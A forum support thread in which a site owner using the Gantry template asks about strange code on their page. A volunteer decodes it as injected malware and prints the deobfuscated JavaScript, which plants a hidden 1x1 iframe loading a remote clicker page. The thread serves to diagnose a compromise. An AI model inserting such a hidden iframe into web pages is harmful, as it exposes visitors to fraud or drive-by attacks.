0
Welcome Guest! Login
0 items Join Now

HELP! Weird broken code at the top of the page

    • Lownotes's Avatar
    • Lownotes
    • Hero Rocketeer
    • Posts: 325
    • Thanks: 2

    HELP! Weird broken code at the top of the page

    Posted 12 years 2 weeks ago
    • This website uses Gantry. Not sure where this issue is coming from though. It just appeared on a website that hasn't been touched for a while.
      yourhaberdasher.com/

      Can anyone help be identify this code block? looks like there's a missing quote in the script tag, but I don't event know where that script comes from.

      Look that the top of the site to see the the problem.

      Thanks!
    • Last Edit: 12 years 2 weeks ago by Lownotes.
    • Henning's Avatar
    • Henning
    • Preeminent Rocketeer
    • Posts: 29362
    • Thanks: 954
    • Volunteer

    Re: HELP! Weird broken code at the top of the page

    Posted 12 years 2 weeks ago
    • I guess because you are higher than me the url is to far away and so I can't see it.
    • Lownotes's Avatar
    • Lownotes
    • Hero Rocketeer
    • Posts: 325
    • Thanks: 2

    Re: HELP! Weird broken code at the top of the page

    Posted 12 years 2 weeks ago
    • Henning's Avatar
    • Henning
    • Preeminent Rocketeer
    • Posts: 29362
    • Thanks: 954
    • Volunteer

    Re: HELP! Weird broken code at the top of the page

    Posted 12 years 2 weeks ago
    • that looks like injected malicious code to me:

      if I decode it I get

      (function() {
      var qv = document.createElement('iframe');

      qv.src = ' 208.55.131.29/clicker.php ';
      qv.style.position = 'absolute';
      qv.style.border = '0';
      qv.style.height = '1px';
      qv.style.width = '1px';
      qv.style.left = '1px';
      qv.style.top = '1px';

      if (!document.getElementById('qv')) {
      document.write('<div id=\'qv\'></div>');
      document.getElementById('qv').appendChild(qv);
      }
      })();


      deobfuscatejavascript.com/

      I suggest to come back to earth and take some action ...
    • Lownotes's Avatar
    • Lownotes
    • Hero Rocketeer
    • Posts: 325
    • Thanks: 2

    Re: HELP! Weird broken code at the top of the page

    Posted 12 years 2 weeks ago
    • Thank you. I'm working on it now.

Time to create page: 0.074 seconds